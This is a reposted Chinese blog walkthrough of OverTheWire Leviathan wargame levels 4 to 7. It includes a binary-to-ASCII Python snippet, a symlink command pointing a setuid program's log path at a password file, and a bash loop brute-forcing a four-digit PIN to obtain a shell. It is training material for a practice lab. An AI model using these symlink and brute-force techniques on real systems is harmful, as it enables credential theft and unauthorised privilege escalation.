码迷,mamicode.com
首页 > 其他好文 > 详细

Leviathan系列4-7

时间:2014-11-26 11:36:59      阅读:204      评论:0      收藏:0      [点我收藏+]

标签:overthewire   linux命令   leviathan   

level 4:二进制转ascii,python脚本

    .trash/bin     #出现一串二进制

    import sys

    a = "01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010"

    for i in a.split(‘ ‘):

        sys.stdout.write(chr(int(i,2)))



level 5:符号链接,ln命令

    ./leviathan5    #提示Cannot find /tmp/file.log

    ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

    ./leviathan5



level 6:brute-forcing

    #题目要求带4-digital为参数运行程序,如果密码正确,会给出shell。

    #有点类似bandit24,新增加的那个,但更简单一些。

    #!/bin/bash

    

    for i in {0000..9999}

      do

        ~/leviathan6 $i

      done


level 7:touch the end now

本文出自 “万物皆刍狗” 博客,请务必保留此出处http://cugou.blog.51cto.com/9637775/1582675

Leviathan系列4-7

标签:overthewire   linux命令   leviathan   

原文地址:http://cugou.blog.51cto.com/9637775/1582675

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!